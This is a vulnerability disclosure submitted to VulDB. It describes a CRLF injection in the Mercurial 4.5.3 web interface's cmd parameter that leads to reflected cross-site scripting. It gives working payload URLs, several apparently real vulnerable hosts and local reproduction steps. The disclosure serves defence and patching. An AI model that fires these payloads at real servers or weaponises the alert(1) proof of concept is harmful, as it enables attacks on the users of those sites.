إرسال #514024: Mercurial Mercurial SCM Web Interface 4.5.3 CRLF Injection leads to Cross-Site Scriptingالمعلومات

عنوانMercurial Mercurial SCM Web Interface 4.5.3 CRLF Injection leads to Cross-Site Scripting
الوصفCRLF Injection Leading to Reflected XSS in Mercurial SCM Repository Summary A CRLF Injection vulnerability has been identified in the Mercurial SCM Web Interface. The vulnerability allows an attacker to inject arbitrary HTTP headers via CRLF, leading to a Reflected Cross-Site Scripting (XSS) attack. This issue arises due to improper sanitization of user-controlled input passed via the ?cmd= parameter. Product Affected: Mercurial SCM Web Interface (mercurial-scm.org) Vendor: Mercurial Distributed SCM (version 4.5.3) Technical Details Vulnerability Type: CRLF Injection (CWE-93) Reflected Cross-Site Scripting (CWE-79) https://host[.]com/[repository]/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E Examples in real world: https://example.com/src/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E https://example.com/gemma/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E https://example.com/libedl/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E https://x.x.x.x/diff-colorize/?cmd=%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E A local installation of Mercurial was performed using the following command: apt install mercurial -y Next, a repository was cloned for testing: hg clone https://hg.weblate.org/gemma/ After cloning, the server was started pointing to the cloned repository: hg serve --repository gemma/ To test the vulnerability, the following URL was accessed: http://localhost:8000/rev/?cmd=%0d%0ax%0d%0aContent-Type:text/html%0d%0a%0d%0a%3Cimg%20src=x%20onerror=alert(1)%3E In the local environment, it was necessary to add %0d%0aX%0d%0a at the beginning of the payload for the exploit to work, whereas on remote servers, just %0d%0a at the beginning was enough to achieve the same result. Explanation: The cmd parameter does not properly sanitize input, allowing an attacker to inject %0d%0a (CRLF characters). This injection modifies HTTP headers, setting Content-Type: text/html, which forces the browser to interpret the response as HTML. An attacker can then inject arbitrary JavaScript payloads, such as <img src=x onerror=alert(1)>, leading to XSS. Since this is a reflected XSS, the payload must be sent as a link to a victim who then executes it in their browser.
المصدر⚠️ https://mercurial-scm.org/
المستخدم
 erickfernandox (UID 57733)
ارسال04/03/2025 01:55 PM (1 سنة منذ)
الاعتدال16/03/2025 10:18 AM (12 days later)
الحالةتمت الموافقة
إدخال VulDB299860 [Mercurial SCM 4.5.3/71.19.145.211 Web Interface cmd البرمجة عبر المواقع]
النقاط17

التالي نظرة عامة السابق

Want to stay up to date on a daily basis?

Enable the mail alert feature now!